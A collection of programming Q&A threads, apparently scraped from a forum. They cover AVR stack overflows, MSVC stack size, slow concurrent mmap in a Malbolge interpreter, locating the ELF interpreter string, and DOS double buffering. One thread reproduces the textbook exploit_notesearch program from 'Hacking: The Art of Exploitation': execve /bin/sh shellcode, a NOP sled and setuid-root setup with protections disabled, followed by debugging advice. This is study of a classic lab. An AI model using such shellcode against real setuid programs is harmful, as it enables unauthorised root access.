AVR/GNU C Compiler and static memory allocation - c

Update - Rephrase question:
Since I know what the bug is! How to know when statical allocation fails at compile time in embedded?
Older:
I have this simple and easy to understand code in "C" below running in Atmega328P-AU with 2K SRAM. I use a well behaved UART library( I used many during debugging ) to get debug strings in my PC terminal.
There is a bug in this code: It freezes. All I get is this output...
Hello World - Loading
I should get a '+' for every loop.
Can you explain me why is freezes and why the compiler does not inform me about allocating statically more memory than the uC can get.
In the code there are all the info you may need.
/**************************************************************************************************
Info
**************************************************************************************************/
/*
Device: Atmega328P-AU - No arduino
IDE: Atmel Studio 6.2
Compiler: AVR/GNU C Compiler : 4.8.1
F_CPU: 8000000 Hz defined in makefile
Fuses:
Extended: 0x07
High: 0xD9
Low: 0xE2
Lockbit: 0xFF
When compiled it show in build output these:
text data bss dec hex filename
1088 0 57 1145 479 Bug Catcher.elf
Done executing task "RunCompilerTask".
Task "RunOutputFileVerifyTask"
Program Memory Usage : 1088 bytes 3,3 % Full
Data Memory Usage : 57 bytes 2,8 % Full
Done executing task "RunOutputFileVerifyTask".
Done building target "CoreBuild" in project "Bug Catcher.cproj".
Target "PostBuildEvent" skipped, due to false condition; ('$(PostBuildEvent)' != '') was evaluated as ('' != '').
Target "Build" in file "C:\Program Files\Atmel\Atmel Studio 6.2\Vs\Avr.common.targets" from project "C:\Users\Tedi\Desktop\Bug Catcher\Bug Catcher\Bug Catcher.cproj" (entry point):
Done building target "Build" in project "Bug Catcher.cproj".
Done building project "Bug Catcher.cproj".
Build succeeded.
========== Rebuild All: 1 succeeded, 0 failed, 0 skipped ==========
*/
/**************************************************************************************************
Definitions
**************************************************************************************************/
#define BIG_NUMBER 1000
// Atmega328P - Pin 12
#define SOFT_UART_RX_DDR DDRB
#define SOFT_UART_RX_DDR_bit DDB0
#define SOFT_UART_RX_PORT PORTB
#define SOFT_UART_RX_PORT_bit PORTB0
#define SOFT_UART_RX_PIN PINB
#define SOFT_UART_RX_PIN_bit PINB0
// Atmega328P Pin 13
#define SOFT_UART_TX_DDR DDRB
#define SOFT_UART_TX_DDR_bit DDB1
#define SOFT_UART_TX_PORT PORTB
#define SOFT_UART_TX_PORT_bit PORTB1
#define SOFT_UART_TX_PIN PINB
#define SOFT_UART_TX_PIN_bit PINB1
/**************************************************************************************************
Includes
**************************************************************************************************/
#include "softuart.h"
#include <avr/io.h>
#include <avr/interrupt.h>
#include <util/delay.h>
#include <string.h>
/**************************************************************************************************
Main function
**************************************************************************************************/
int main()
{
/**********************************************************************************************
Setup
**********************************************************************************************/
softuart_init( &SOFT_UART_TX_DDR, SOFT_UART_TX_DDR_bit,
&SOFT_UART_TX_PORT, SOFT_UART_TX_PORT_bit,
&SOFT_UART_RX_DDR, SOFT_UART_RX_DDR_bit,
&SOFT_UART_RX_PIN, SOFT_UART_RX_PIN_bit );
sei();
softuart_puts_P( "\r\n\r\nHello World - Loading\r\n\r\n" ); // Can use custom UART function.
_delay_ms( 200 );
/**********************************************************************************************
Forever loop
**********************************************************************************************/
while(1)
{
char temp[BIG_NUMBER];
memset( temp, '\0', sizeof( temp ) );
{
char temp[BIG_NUMBER];
memset( temp, '\0', sizeof( temp ) );
{
char temp[BIG_NUMBER];
memset( temp, '\0', sizeof( temp ) );
}
}
softuart_puts_P("+"); // BUG!!!!! It never reaches here.
_delay_ms( 500 );
}
}

The linker allocates the static storage, in your case 57 bytes (data plus bss segments). So as long as you have a too big variable with static storage, you should see an error message from the linker.
The variable temp[1000] is an automatic variable, it is allocated at run time on the stack. The RAM that is not statically allocated by the linker is used for the stack. This bug is an easy case, you are allocating a single variable that is bigger than the entire RAM of the device, but normally this kind of error is really really hard to detect. One solution is to check the available stack space at runtime. As a simple rule: don't allocate big stuff on the stack. You will only see it fail when that function is called.
temp[1000] is used for the entire runtime of the program, so you don't loose anything by just moving it into static storage. Put a "static" in front of it and you will (hopefully) see an error message from the linker.

Related

Change stack size in VSCode

I would like to declare and initialize a large 3D array on stack. The c function declares the large 3D array as:
#define NMATS 36
#define ROWS 10000
#define COLS 9
void myfunc(void)
{
double mat[NMATS][ROWS][COLS];
// Initialize later ...
}
In VS Code, the command cl.exe /Zi /EHsc /Fe: C:\Users\usr\project\c\build\main.exe c:\Users\usr\project\c\src\main.c successfully builds the code. However, during runtime I get the error:
Unable to open 'chkstk.asm': File not found.
This indicates that my Stack Reserve Size is too small. However, I am relatively new to VS Code and would like to know how to increase the stack reserve size and specify the option for cl.exe.
As mentioned in the comments, do a dynamic allocation so you don't have to rely on compiler switches and architecture limitations:
#define NMATS 36
#define ROWS 10000
#define COLS 9
typedef double MAT[NMATS][ROWS][COLS];
void myfunc(void)
{
MAT* mat = (MAT*)malloc(sizeof(MAT));
// initialize the matrix by referencing it as `*mat`
(*mat)[0][0][0] = 0;
free(mat);
}
But if you insist on needing a stack allocation:
Assuming sizeof(double)==8, 36*10000*9*sizeof(double) == 25,920,000. So you'd need at least that many bytes in stack space plus a little bit more for additional function call and local variable overhead. So let's add on another million bytes and round up to 27 million bytes.
If you really insist on having a stack allocation of 27 MB available. And I'm assuming you are using the Microsoft compiler:
Set the linker option: /STACK:27000000
The above works for all Visual Studio projects.
If your custom build step is just a single run of cl.exe (and not a separate linker step), you can have the compiler forward the command line option via the /F command parameter:
cl.exe /F27000000 /Zi /EHsc /Fe: C:\Users\usr\project\c\build\main.exe c:\Users\usr\project\c\src\main.c
https://learn.microsoft.com/en-us/cpp/build/reference/f-set-stack-size?view=msvc-170
https://learn.microsoft.com/en-us/cpp/build/reference/stack-stack-allocations?view=msvc-170

Poor `mmap` performance on substantial system load

We're currently facing a somewhat complex problem with mmap performance on our Linux server.
We use a server with 64-core AMD Opteron 6374 and 128GiB of RAM. Here, we created a qemu virtual machine with the same core count and 64GiB of RAM. We use it for unit-testing a program I wrote. There are around 60 unit tests that run in parallel, each of which allocates a little over 1GiB of RAM. Because the process memory compresses really well, we decided to enable Zram. During our tests, the memory usage dropped to around 300MiB for each process, which is a significant gain, at a relatively small performance loss (the swap area stays in physical memory).
Currently, with our tests, we don't swap just yet, but we've observed very poor mmap performance. A single call to mmap, from our testing, could take up to 7 minutes (without swapping, of course; allocating maybe somewhere between 2MBps-20MBps of memory). Sometimes, though all mmaps on all the 60 processes are nearly instant and the processes allocate the required gigabyte of RAM. We watch them allocating tiny amounts of memory per second in real time, though:
The program I wrote follows:
// CC0, inspired by dzaima's code, which was inspired by my code.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <signal.h>
#include <unistd.h>
#define u8 uint8_t
#define i32 int32_t
#define u32 uint32_t
#define i64 int64_t
#define u64 uint64_t
#define C const
#define P static
#define _(a...) {return({a;});}
#define F_(n,a...) for(int i=0;i<n;i++){a;}
#define F1(n,x,a...) for(i32 i=0;i<n;i+=x){a;}
#define INLINE P inline __attribute__((always_inline))
#define assert(X) if(!(X))__builtin_unreachable();
#define LKL(c) __builtin_expect((c),1)
typedef u32 W;
#define SZ 19
#define END 1162261467ULL
P C u8 crz[]={1,0,0,9,1,0,2,9,2,2,1},crz2[]={4,3,3,1,0,0,1,0,0,9,9,9,9,9,9,9,4,3,5,1,0,2,1,0,2,9,9,9,9,9,9,9,5,5,4,2,2,1,2,2,1,9,9,9,9,9,9,9,4,3,3,1,0,0,7,6,6,9,9,9,9,9,9,9,4,3,5,1,0,2,7,6,8,9,9,9,9,9,9,9,5,5,4,2,2,1,8,8,7,9,9,9,9,9,9,9,7,6,6,7,6,6,4,3,3,9,9,9,9,9,9,9,7,6,8,7,6,8,4,3,5,9,9,9,9,9,9,9,8,8,7,8,8,7,5,5,4,9,9,9,9,9,9,9};
#define UNR_CRZ(trans,sf1,sf2)W am=a%sf1,ad=a/sf1,dm=d%sf1,dd=d/sf1;r+=k*trans[am+sf2*dm];a=ad;d=dd;k*=sf1;
INLINE W mcrz(W a, W d){W r=0,k=1;
#pragma GCC unroll 16
F_(SZ/2,UNR_CRZ(crz2,9,16))if(SZ&1){UNR_CRZ(crz,3,4)}return r;}
INLINE W mrot(W x)_(W t=END/3,b=x%t,m=b%3,d=b/3;d+m*(t/3)+(x-b))
P u64 pgsiz;
P W*mem,pat[6];
P void mpstb(void*b,u64 l){mmap(b,l,PROT_READ|PROT_WRITE,MAP_POPULATE|MAP_PRIVATE|MAP_ANON|MAP_FIXED,-1,0);}
P void sigsegvh(int n,siginfo_t*si,void*_) {
void*a=si->si_addr,*ab=(void*)((u64)a&~(pgsiz-1));mpstb(ab, pgsiz);
W* curr=ab;i64 off=(curr-mem)%(END/3);F1(pgsiz,sizeof(W),*curr++=pat[off++%6]);}
P u64 rup(u64 v)_(((v-1)&~(pgsiz-1))+pgsiz)
#define RDS 65536
__attribute__((hot,flatten))int main(int argc, char* argv[]){
pgsiz=sysconf(_SC_PAGESIZE);mem=mmap(NULL,END*sizeof(W),PROT_NONE,MAP_NORESERVE|MAP_PRIVATE|MAP_ANON,-1,0);
struct sigaction act;memset(&act,0,sizeof(struct sigaction));act.sa_flags=SA_SIGINFO;act.sa_sigaction=sigsegvh;sigaction(SIGSEGV,&act,NULL);
FILE*f=fopen(argv[1],"rb");fseek(f,0,SEEK_END);u64 S=ftell(f);rewind(f);u64 szR=rup(S),off=0;mpstb(mem, szR*sizeof(W));char data[RDS];
C W a1_off=94-((END-1)/6-29524)%94,a2_off=94-((END-1)/3-59048)%94;while(S){int am=LKL(S>RDS)?RDS:S;fread(&data,1,am,f);
#pragma GCC unroll 32
F_(am,W w=data[i];mem[off++]=w)S-=am;}for(;off<szR;off++)mem[off]=mcrz(mem[off-1],mem[off-2]);
W n2=mem[off-2],n1=mem[off-1];u64 off2=off;F_(6,W n0=mcrz(n1,n2);pat[off2%6]=n0;n2=n1;n1=n0;off2++)W c=0,a=0,*d=mem;
P C int offs[]={0,((i64)a1_off-(i64)(END/3))%94+94,((i64)a2_off-(i64)(2*(END/3))%94+94)};P C void*j[94];F_(94,j[i]=&&INS_DEF)
#define M(n) j[n]=&&INS_##n;
M(4)M(5)M(23)M(39)M(40)M(62)M(68)M(81)
#define BRA {goto*j[(c+mem[c]+offs[c/(END/3)])%94];}
BRA;
#define NXT mem[c] = \
"SOMEBODY MAKE ME FEEL ALIVE" \
"[hj9>,5z]&gqtyfr$(we4{WP)H-Zn,[%\\3dL+Q;>U!pJS72FhOA1CB6v^=I_0/8|jsb9m<.TVac`uY*MK'X~xDl}REokN:#?G\"i#" \
"AND SHATTER ME"[mem[c]];c++;d++;BRA
INS_4:c=*d;NXT;INS_5:putchar(a);fflush(stdout);NXT;
INS_23:;int CR=getchar();a=CR==EOF?END-1:CR;NXT;INS_39:a=*d=mrot(*d);NXT;INS_40:d=mem+*d;NXT;
INS_62:a=*d=mcrz(a, *d);INS_68:NXT;INS_81:return 0;INS_DEF:NXT;
}
It's an interpreter for rotwidth=19 variant of Malbolge Unshackled (compiled with clang fast20.c -w -O3 -march=native -mtune=native -o fast20 -flto -mllvm -polly -fvisibility=hidden, clang -v yields Debian clang version 11.0.1-2). We feed it with the source code of my project (passed as an argument to the program), temporarily available here (provided hoping that it's possible to reproduce our issue; use 7za to unpack).
Each time I want to run the unit tests, i execute the following shell script:
#!/bin/bash
# XXX: `rsync` is slower
echo "[+] sending test data."
cd kiera-tests && \
tar -czf - * | \
ssh kamila#remote \
"cd ~/malbolgelisp && rm -rf tests && mkdir tests && cd tests && tar -xzf -" && \
cd ..
echo "[+] building essential tools."
ssh kamila#remote "cd ~/malbolgelisp/tests && chmod a+x setup.sh && ./setup.sh"
echo "[+] sending malbolgelisp source code..."
tool/mb_nlib d < lisp.mb | \
pv | gzip -6 | \
ssh kamila#remote \
"gunzip | ~/malbolgelisp/tests/mb_nlib e > ~/malbolgelisp/lisp.mb && vmtouch -vt ~/malbolgelisp/lisp.mb"
echo "[+] running the tests..."
ssh kamila#remote "cd ~/malbolgelisp/tests/ && ./test.sh"
I vmtouch the ~300MB file, so it must have stayed in cache across the runs.
/home/kamila/malbolgelisp/lisp.mb
[OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO] 76711/76711
Files: 1
Directories: 0
Touched Pages: 76711 (299M)
Elapsed: 0.071541 seconds
As we've observed, the cached memory shown by bpytop grows up to 500MiB, which means that the file must have been cached. We also reupload the file each time and it changes significantly.
We tried using Valgrind on the interpreter, but it seems to misbehave under this condition for a yet unknown reason. It's easy to deduce what is happening in the code, though:
pgsiz=sysconf(_SC_PAGESIZE);
mem=mmap(NULL,END*sizeof(W),PROT_NONE,MAP_NORESERVE|MAP_PRIVATE|MAP_ANON,-1,0);
first, entire memory area is mapped.
FILE*f=fopen(argv[1],"rb");fseek(f,0,SEEK_END);u64 S=ftell(f);rewind(f);
u64 szR=rup(S),off=0;mpstb(mem, szR*sizeof(W));
then I query the file size (~300MiB, times sizeof(W) = ~1.2GiB), and map eagerly this amount of memory using mpstb:
P void mpstb(void*b,u64 l){
mmap(b,l,PROT_READ|PROT_WRITE,MAP_POPULATE|MAP_PRIVATE|MAP_ANON|MAP_FIXED,-1,0);}
I considered using mprotect, but in the following parts of the code we execute mpstb fairly often, causing IPIs for TLB shootdowns.
the following bit of code can't be a bottleneck, since aside from the I/O it performs (which is happening on a cached file with a relatively big buffer - RDS = 65536 => should be fast) a bunch of mathematical operations which can't take 7 minutes on one run with the same data and a few seconds on the other run with the same data:
C W a1_off=94-((END-1)/6-29524)%94,a2_off=94-((END-1)/3-59048)%94;
while(S){int am=LKL(S>RDS)?RDS:S;fread(&data,1,am,f);
#pragma GCC unroll 32
F_(am,W w=data[i];mem[off++]=w)S-=am;}
for(;off<szR;off++)mem[off]=mcrz(mem[off-1],mem[off-2]);
We've also noticed that in the following test runner which is executed on the server:
#!/bin/bash
for d in b*; do
for f in $d/*.in; do
echo "[+] $f"
(./fast20 ../lisp.mb $f < $f > $f.aout; diff ${f%%.*}.out $f.aout) &
# sleep 3s
done
for job in `jobs -p`; do
wait $job
done
done
uncommenting the # sleep 3s line makes the allocations much faster, meaning that the Linux kernel simply can't handle a dozen of processes mapping a single gigabyte of memory concurrently. we've also seen these messages pop up during our testing: watchdog: BUG: soft lockup - CPU#34 stuck for 24s! that messed up our bpytop view. Some googling reveals that it's printed when the CPU is stuck for too long in the kernel, which would be yet another argument proving that mmap in this example is ridicously slow.
we've also suspected that it might be caused by memory ballooning on qemu, but disabling it made very little difference.
interestingly enough, all the processes seem to slowly and concurrently allocate memory.
the documentation for the lisp interpreter is available here and it can be used to construct test cases - the simplest one being (+ 2 2).
my question follows - can we do something about this bug? are we missing something? i know that running less processes at a time makes it actually bearable (the runtime drops from 30m to 5m), but if not the allocation performance, the tests could easily finish within 40 seconds, which would be a huge improvement. Is it mmap being inherently slow on Linux when called by multiple processes concurrently?
finally, please let me know if we should provide any further details.

How can I access interpreter path address at runtime in C?

By using the objdump command I figured that the address 0x02a8 in memory contains start the path /lib64/ld-linux-x86-64.so.2, and this path ends with a 0x00 byte, due to the C standard.
So I tried to write a simple C program that will print this line (I used a sample from the book "RE for beginners" by Denis Yurichev - page 24):
#include <stdio.h>
int main(){
printf(0x02a8);
return 0;
}
But I was disappointed to get a segmentation fault instead of the expected /lib64/ld-linux-x86-64.so.2 output.
I find it strange to use such a "fast" call of printf without specifiers or at least pointer cast, so I tried to make the code more natural:
#include <stdio.h>
int main(){
char *p = (char*)0x02a8;
printf(p);
printf("\n");
return 0;
}
And after running this I still got a segmentation fault.
I don't believe this is happening because of restricted memory areas, because in the book it all goes well at the 1st try. I am not sure, maybe there is something more that wasn't mentioned in that book.
So need some clear explanation of why the segmentation faults keep happening every time I try running the program.
I'm using the latest fully-upgraded Kali Linux release.
Disappointing to see that your "RE for beginners" book does not go into the basics first, and spits out this nonsense. Nonetheless, what you are doing is obviously wrong, let me explain why.
Normally on Linux, GCC produces ELF executables that are position independent. This is done for security purposes. When the program is run, the operating system is able to place it anywhere in memory (at any address), and the program will work just fine. This technique is called Address Space Layout Randomization, and is a feature of the operating system that nowdays is enabled by default.
Normally, an ELF program would have a "base address", and would be loaded exactly at that address in order to work. However, in case of a position independent ELF, the "base address" is set to 0x0, and the operating system and the interpreter decide where to put the program at runtime.
When using objdump on a position independent executable, every address that you see is not a real address, but rather, an offset from the base of the program (that will only be known at runtime). Therefore it is not possible to know the position of such a string (or any other variable) at runtime.
If you want the above to work, you will have to compile an ELF that is not position independent. You can do so like this:
gcc -no-pie -fno-pie prog.c -o prog
It no longer works like that. The 64-bit Linux executables that you're likely using are position-independent and they're loaded into memory at an arbitrary address. In that case ELF file does not contain any fixed base address.
While you could make a position-dependent executable as instructed by Marco Bonelli it is not how things work for arbitrary executables on modern 64-bit linuxen, so it is more worthwhile to learn to do this with position-independent ones, but it is a bit trickier.
This worked for me to print ELF i.e. the elf header magic, and the interpreter string. This is dirty in that it probably only works for a small executable anyway.
#include <stdio.h>
#include <stdlib.h>
#include <inttypes.h>
int main(){
// convert main to uintptr_t
uintptr_t main_addr = (uintptr_t)main;
// clear bottom 12 bits so that it points to the beginning of page
main_addr &= ~0xFFFLLU;
// subtract one page so that we're in the elf headers...
main_addr -= 0x1000;
// elf magic
puts((char *)main_addr);
// interpreter string, offset from hexdump!
puts((char *)main_addr + 0x318);
}
There is another trick to find the beginning of the ELF executable in memory: the so-called auxiliary vector and getauxval:
The getauxval() function retrieves values from the auxiliary vector,
a mechanism that the kernel's ELF binary loader uses to pass certain
information to user space when a program is executed.
The location of the ELF program headers in memory will be
#include <sys/auxv.h>
char *program_headers = (char*)getauxval(AT_PHDR);
The actual ELF header is 64 bytes long, and the program headers start at byte 64 so if you subtract 64 from this you will get a pointer to the magic string again, therefore our code can be simplified to
#include <stdio.h>
#include <inttypes.h>
#include <sys/auxv.h>
int main(){
char *elf_header = (char *)getauxval(AT_PHDR) - 0x40;
puts(elf_header + 0x318); // or whatever the offset was in your executable
}
And finally, an executable that figures out the interpreter position from the ELF headers alone, provided that you've got a 64-bit ELF, magic numbers from Wikipedia...
#include <stdio.h>
#include <inttypes.h>
#include <sys/auxv.h>
int main() {
// get pointer to the first program header
char *ph = (char *)getauxval(AT_PHDR);
// elf header at this position
char *elfh = ph - 0x40;
// segment type 0x3 is the interpreter;
// program header item length 0x38 in 64-bit executables
while (*(uint32_t *)ph != 3) ph += 0x38;
// the offset is 64 bits at 0x8 from the beginning of the
// executable
uint64_t offset = *(uint64_t *)(ph + 0x8);
// print the interpreter path...
puts(elfh + offset);
}
I guess it segfaults because of the way you use printf: you dont use the format parameter how it is designed to be.
When you want to use the printf function to read data the first argument it takes is a string that will format how the display will work int printf(char *fmt , ...) "the ... represent the data you want to display accordingly to the format string parameter
so if you want to print a string
//format as text
printf("%s\n", pointer_to_beginning_of_string);
//
If this does not work cause it probably will it is because you are trying to read memory that you are not supposed to access.
try adding extra flags " -Werror -Wextra -Wall -pedantic " with your compiler and show us the errors please.

Why do I get a segmentation fault in the exploit_notesearch program from "Hacking: The Art of Exploitation"?

So, to start off with, I am on Kali 2020.1, fully updated. 64 bit.
The source code is as follows:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include "hacking.h"
#include <unistd.h>
#include <stdlib.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
long int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory.
strcpy(command, "./notesearch \'"); // Start command buffer.
buffer = command + strlen(command); // Set buffer at the end.
if(argc > 1) // Set offset.
offset = atoi(argv[1]);
ret = (long int) &i - offset; // Set return address.
for(i=0; i < 160; i+=4) // Fill buffer with return address.
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // Build NOP sled.
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // Run exploit.
free(command);
}
Now, some important clarifications. I included all those libraries because compilation throws warnings without them.
The preceding notetaker and notesearch programs, as well as this exploit_notesearch program have been compiled as follows in the Terminal:
gcc -g -mpreferred-stack-boundary=4 -no-pie -fno-stack-protector -Wl,-z,norelro -z execstack -o exploit_notesearch exploit_notesearch.c
I no longer remember the source which said I must compile this way (the preferred stack boundary was 2 for them, but my machine requires it to be between 4 and 12). Also, the stack is executable now as you can see.
All 3 programs (notetaker, notesearch, and exploit_notesearch) had their permissions modified as in the book:
sudo chown root:root ./program_name
sudo chmod u+s ./program_name
I tried following the solution from this link: Debugging Buffer Overflow Example , but to no avail. Same goes for this link: Not So Fast Shellcode Exploit
Changing the offset incrementally from 0 to 330 by using increments of 1, 10, 20, and 30 in the terminal using a for-loop also did not solve my problem. I keep getting a segmentation fault no matter what I do.
What could be the issue in my case and what would be the best way to overcome said issue? Thank you.
P.S I remember reading that I'm supposed to use 64-bit shellcode instead of the one provided.
When you are segfaulting, it is a great time to run it within a debugger like GDB. It should tell you right where you are crashing, and you can step through the execution and validate the assumptions you are making. The most common segfaults tend to be invalid memory permissions (like trying to execute a non-executable page) or an invalid instruction (eg., if you land in the middle of shellcode, not in a NOP sled).
You are running into a couple of issues trying to convert the exploit to work on 32-bit. When filling the buffer with return addresses, it's using the constant 4 when pointers on 64-bit are actually 8 bytes.
for(i=0; i < 160; i+=4) // Fill buffer with return address.
*((unsigned int *)(buffer+i)) = ret;
That could also present some issues when trying to exploit the strcpy bug, because those 64-bit addresses will contain NULL bytes (since the usable address space only uses 6 of the 8 bytes). Thus, if you have some premature NULL bytes before actually overwriting the return address on the stack, you won't actually copy enough data to leverage the overflow as intended.

How do I properly allocate a memory buffer to apply double buffering in dosbox using turbo c?

Okay so I am trying to apply a double buffering technique in an emulated environment (DosBox) while using the IDE Turbo C++ 3.0 I am running windows 7 64bit(Not sure if that matters) and I have no clue how to properly execute the buffering routine in this environment.
The main problem I am having is that I can't seem to execute the following assignment statement:
double_buffer = (byte_t far*)farmalloc((unsigned long)320*200);
(Note that 320 and 200 are the screen sizes)...
I just get NULL for the assignment.
I tried changing the default RAM usage of the DosBox to 32 instead of 16, but that didn't do anything. I'm not sure if it's the emulator or there is something wrong with the code for Turbo C. (Note that it complies just fine).
Here is a sample program I found online:
#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <dos.h>
#include <string.h>
#include <alloc.h>
typedef unsigned char byte_t;
byte_t far* video_buffer = (byte_t far*)0xA0000000;
void vid_mode(byte_t mode){
union REGS regs;
regs.h.ah = 0;
regs.h.al = mode;
int86(0x10,&regs,&regs);
}
void blit(byte_t far* what){
_fmemcpy(video_buffer,what,320*200);
}
int main(){
int x,y;
byte_t far* double_buffer;
double_buffer = (byte_t far*)farmalloc((unsigned long)320*200);
if(double_buffer == NULL){
printf("sorry, not enough memory.\n");
return 1;
}
_fmemset(double_buffer,0,(unsigned long)320*200);
vid_mode(0x13);
while(!kbhit()){
x = rand()%320;
y = rand()%200;
double_buffer[y * 320 + x] = (byte_t)(rand()%256);
blit(double_buffer);
}
vid_mode(0x03);
farfree(double_buffer);
return 0;
}
Your problem is related to running your application within the Turbo-C IDE debugger. If you compile it and then exit the IDE and run it directly from the DosBox command line without the IDE it should work as expected.
When running via the IDE, the default debug option is to only allocate an additional 64KiB memory for your program's heap. This isn't enough to handle your request for the 64000 bytes (320*200). In the Turbo-C IDE pull down the options menu, click on debugger. You should get a screen that looks like this:
The default value for Program Heap Size is 64. Change it to the maximum 640 and then click Ok. Rerun your program and it should display randomly colored pixels on the display at random locations.

Resources